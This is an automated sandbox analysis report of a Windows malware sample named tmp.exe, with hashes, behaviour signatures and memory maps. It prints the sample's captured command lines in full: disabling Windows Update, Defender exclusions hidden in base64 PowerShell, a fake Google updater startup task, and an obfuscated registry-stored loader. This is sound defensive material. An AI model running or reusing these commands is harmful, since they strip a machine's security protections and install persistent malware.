Analysis
-
max time kernel
14s -
max time network
30s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2022 05:41
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20220901-en
General
-
Target
tmp.exe
-
Size
4.5MB
-
MD5
b7c12ce33a5c2de80bcd7083d839df6e
-
SHA1
6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1
-
SHA256
65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52
-
SHA512
b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225
-
SSDEEP
98304:Ha3DFNglg7shj9/X92ZmvG+Hc7supSg8MXGBl3Qbf2jYpvRhzPQA:q23V9/X9pvL+sWKMXGwDEYVx
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 4616 takeown.exe 216 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
tmp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation tmp.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 4616 takeown.exe 216 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
tmp.exedescription pid process target process PID 3844 set thread context of 1304 3844 tmp.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 2160 sc.exe 3212 sc.exe 1908 sc.exe 4008 sc.exe 3988 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 2988 reg.exe 3936 reg.exe 4716 reg.exe 4404 reg.exe 4152 reg.exe 5068 reg.exe 3548 reg.exe 1284 reg.exe 1740 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exetmp.exepowershell.exepid process 3388 powershell.exe 3388 powershell.exe 3844 tmp.exe 4952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exetmp.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 3388 powershell.exe Token: SeDebugPrivilege 3844 tmp.exe Token: SeShutdownPrivilege 4112 powercfg.exe Token: SeCreatePagefilePrivilege 4112 powercfg.exe Token: SeShutdownPrivilege 2116 powercfg.exe Token: SeCreatePagefilePrivilege 2116 powercfg.exe Token: SeShutdownPrivilege 3756 powercfg.exe Token: SeCreatePagefilePrivilege 3756 powercfg.exe Token: SeShutdownPrivilege 1996 powercfg.exe Token: SeCreatePagefilePrivilege 1996 powercfg.exe Token: SeTakeOwnershipPrivilege 4616 takeown.exe Token: SeDebugPrivilege 4952 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tmp.execmd.execmd.exedescription pid process target process PID 3844 wrote to memory of 3388 3844 tmp.exe powershell.exe PID 3844 wrote to memory of 3388 3844 tmp.exe powershell.exe PID 3844 wrote to memory of 2228 3844 tmp.exe cmd.exe PID 3844 wrote to memory of 2228 3844 tmp.exe cmd.exe PID 3844 wrote to memory of 2800 3844 tmp.exe cmd.exe PID 3844 wrote to memory of 2800 3844 tmp.exe cmd.exe PID 2228 wrote to memory of 2160 2228 cmd.exe sc.exe PID 2228 wrote to memory of 2160 2228 cmd.exe sc.exe PID 2800 wrote to memory of 4112 2800 cmd.exe powercfg.exe PID 2800 wrote to memory of 4112 2800 cmd.exe powercfg.exe PID 2228 wrote to memory of 3212 2228 cmd.exe sc.exe PID 2228 wrote to memory of 3212 2228 cmd.exe sc.exe PID 2800 wrote to memory of 2116 2800 cmd.exe powercfg.exe PID 2800 wrote to memory of 2116 2800 cmd.exe powercfg.exe PID 2228 wrote to memory of 1908 2228 cmd.exe sc.exe PID 2228 wrote to memory of 1908 2228 cmd.exe sc.exe PID 2228 wrote to memory of 4008 2228 cmd.exe sc.exe PID 2228 wrote to memory of 4008 2228 cmd.exe sc.exe PID 2800 wrote to memory of 3756 2800 cmd.exe powercfg.exe PID 2800 wrote to memory of 3756 2800 cmd.exe powercfg.exe PID 2228 wrote to memory of 3988 2228 cmd.exe sc.exe PID 2228 wrote to memory of 3988 2228 cmd.exe sc.exe PID 2800 wrote to memory of 1996 2800 cmd.exe powercfg.exe PID 2800 wrote to memory of 1996 2800 cmd.exe powercfg.exe PID 2228 wrote to memory of 3936 2228 cmd.exe reg.exe PID 2228 wrote to memory of 3936 2228 cmd.exe reg.exe PID 2228 wrote to memory of 4716 2228 cmd.exe reg.exe PID 2228 wrote to memory of 4716 2228 cmd.exe reg.exe PID 2228 wrote to memory of 4404 2228 cmd.exe reg.exe PID 2228 wrote to memory of 4404 2228 cmd.exe reg.exe PID 2228 wrote to memory of 5068 2228 cmd.exe reg.exe PID 2228 wrote to memory of 5068 2228 cmd.exe reg.exe PID 2228 wrote to memory of 4152 2228 cmd.exe reg.exe PID 2228 wrote to memory of 4152 2228 cmd.exe reg.exe PID 2228 wrote to memory of 4616 2228 cmd.exe takeown.exe PID 2228 wrote to memory of 4616 2228 cmd.exe takeown.exe PID 2228 wrote to memory of 216 2228 cmd.exe icacls.exe PID 2228 wrote to memory of 216 2228 cmd.exe icacls.exe PID 2228 wrote to memory of 3548 2228 cmd.exe reg.exe PID 2228 wrote to memory of 3548 2228 cmd.exe reg.exe PID 2228 wrote to memory of 1284 2228 cmd.exe reg.exe PID 2228 wrote to memory of 1284 2228 cmd.exe reg.exe PID 2228 wrote to memory of 1740 2228 cmd.exe reg.exe PID 2228 wrote to memory of 1740 2228 cmd.exe reg.exe PID 2228 wrote to memory of 2988 2228 cmd.exe reg.exe PID 2228 wrote to memory of 2988 2228 cmd.exe reg.exe PID 2228 wrote to memory of 1172 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 1172 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 1840 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 1840 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 2420 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 2420 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 2404 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 2404 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 4868 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 4868 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 4432 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 4432 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 3040 2228 cmd.exe schtasks.exe PID 2228 wrote to memory of 3040 2228 cmd.exe schtasks.exe PID 3844 wrote to memory of 1304 3844 tmp.exe conhost.exe PID 3844 wrote to memory of 1304 3844 tmp.exe conhost.exe PID 3844 wrote to memory of 1304 3844 tmp.exe conhost.exe PID 3844 wrote to memory of 1304 3844 tmp.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgByAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBpAHcAdwAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbQB5AHcAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBVAEEAYwB3AEIAcwBBAEMATQBBAFAAZwBBAGcAQQBGAE0AQQBkAEEAQgBoAEEASABJAEEAZABBAEEAdABBAEYAQQBBAGMAZwBCAHYAQQBHAE0AQQBaAFEAQgB6AEEASABNAEEASQBBAEEAdABBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMAYwBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBBAGcAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAYwB3AEIAYwBBAEUAYwBBAGIAdwBCAHYAQQBHAGMAQQBiAEEAQgBsAEEARgB3AEEAUQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBYAEEAQgAxAEEASABBAEEAWgBBAEIAaABBAEgAUQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGwAQQBIAEkAQQBZAGcAQQBnAEEARgBJAEEAZABRAEIAdQBBAEUARQBBAGMAdwBBAGcAQQBEAHcAQQBJAHcAQgB4AEEARwBVAEEASQB3AEEAKwBBAEEAPQA9ACIAJwApACAAPAAjAGYAcgAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGMAawBrACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAeAB4ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdgB2AGUAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAB0AG0AcAAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGkAeQBiAHoAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGgAYwBiAHgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6c518598-23a0-455c-a0f3-878b0a2f6618}1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGUAcwBsACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBxAGUAIwA+AA=="1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD559d97011e091004eaffb9816aa0b9abd
SHA11602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA25618f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6
-
memory/216-156-0x0000000000000000-mapping.dmp
-
memory/608-200-0x00007FFA31DD0000-0x00007FFA31DE0000-memory.dmpFilesize
64KB
-
memory/664-201-0x00007FFA31DD0000-0x00007FFA31DE0000-memory.dmpFilesize
64KB
-
memory/1020-202-0x00007FFA31DD0000-0x00007FFA31DE0000-memory.dmpFilesize
64KB
-
memory/1172-162-0x0000000000000000-mapping.dmp
-
memory/1276-212-0x00007FFA31DD0000-0x00007FFA31DE0000-memory.dmpFilesize
64KB
-
memory/1284-159-0x0000000000000000-mapping.dmp
-
memory/1304-172-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1304-171-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1304-169-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1304-173-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1304-170-0x0000000140001844-mapping.dmp
-
memory/1304-174-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1484-216-0x00007FFA31DD0000-0x00007FFA31DE0000-memory.dmpFilesize
64KB
-
memory/1740-160-0x0000000000000000-mapping.dmp
-
memory/1840-163-0x0000000000000000-mapping.dmp
-
memory/1908-145-0x0000000000000000-mapping.dmp
-
memory/1996-149-0x0000000000000000-mapping.dmp
-
memory/2060-177-0x0000000003E30000-0x0000000003E66000-memory.dmpFilesize
216KB
-
memory/2060-181-0x0000000004410000-0x0000000004432000-memory.dmpFilesize
136KB
-
memory/2060-196-0x00000000053C0000-0x00000000053DE000-memory.dmpFilesize
120KB
-
memory/2060-184-0x0000000004D70000-0x0000000004DD6000-memory.dmpFilesize
408KB
-
memory/2060-182-0x0000000004D00000-0x0000000004D66000-memory.dmpFilesize
408KB
-
memory/2060-180-0x00000000044A0000-0x0000000004AC8000-memory.dmpFilesize
6.2MB
-
memory/2116-144-0x0000000000000000-mapping.dmp
-
memory/2160-141-0x0000000000000000-mapping.dmp
-
memory/2228-138-0x0000000000000000-mapping.dmp
-
memory/2404-165-0x0000000000000000-mapping.dmp
-
memory/2420-164-0x0000000000000000-mapping.dmp
-
memory/2800-139-0x0000000000000000-mapping.dmp
-
memory/2988-161-0x0000000000000000-mapping.dmp
-
memory/3040-168-0x0000000000000000-mapping.dmp
-
memory/3212-143-0x0000000000000000-mapping.dmp
-
memory/3388-136-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmpFilesize
10.8MB
-
memory/3388-137-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmpFilesize
10.8MB
-
memory/3388-135-0x00000145E99A0000-0x00000145E99C2000-memory.dmpFilesize
136KB
-
memory/3388-134-0x0000000000000000-mapping.dmp
-
memory/3548-157-0x0000000000000000-mapping.dmp
-
memory/3756-147-0x0000000000000000-mapping.dmp
-
memory/3844-132-0x0000000000F70000-0x00000000013F6000-memory.dmpFilesize
4.5MB
-
memory/3844-199-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmpFilesize
10.8MB
-
memory/3844-140-0x000000001CE80000-0x000000001CE92000-memory.dmpFilesize
72KB
-
memory/3844-158-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmpFilesize
10.8MB
-
memory/3844-133-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmpFilesize
10.8MB
-
memory/3936-150-0x0000000000000000-mapping.dmp
-
memory/3988-148-0x0000000000000000-mapping.dmp
-
memory/4008-146-0x0000000000000000-mapping.dmp
-
memory/4112-142-0x0000000000000000-mapping.dmp
-
memory/4152-154-0x0000000000000000-mapping.dmp
-
memory/4188-190-0x00007FFA71D50000-0x00007FFA71F45000-memory.dmpFilesize
2.0MB
-
memory/4188-195-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4188-186-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4188-187-0x00000001400033F4-mapping.dmp
-
memory/4188-188-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4188-189-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/4188-191-0x00007FFA70F50000-0x00007FFA7100E000-memory.dmpFilesize
760KB
-
memory/4188-197-0x00007FFA71D50000-0x00007FFA71F45000-memory.dmpFilesize
2.0MB
-
memory/4404-152-0x0000000000000000-mapping.dmp
-
memory/4432-167-0x0000000000000000-mapping.dmp
-
memory/4616-155-0x0000000000000000-mapping.dmp
-
memory/4716-151-0x0000000000000000-mapping.dmp
-
memory/4768-193-0x00007FFA70F50000-0x00007FFA7100E000-memory.dmpFilesize
760KB
-
memory/4768-194-0x00007FFA71D50000-0x00007FFA71F45000-memory.dmpFilesize
2.0MB
-
memory/4768-183-0x00007FFA71D50000-0x00007FFA71F45000-memory.dmpFilesize
2.0MB
-
memory/4768-192-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmpFilesize
10.8MB
-
memory/4768-185-0x00007FFA70F50000-0x00007FFA7100E000-memory.dmpFilesize
760KB
-
memory/4768-179-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmpFilesize
10.8MB
-
memory/4868-166-0x0000000000000000-mapping.dmp
-
memory/4952-198-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmpFilesize
10.8MB
-
memory/4952-178-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmpFilesize
10.8MB
-
memory/4952-175-0x0000000000000000-mapping.dmp
-
memory/5068-153-0x0000000000000000-mapping.dmp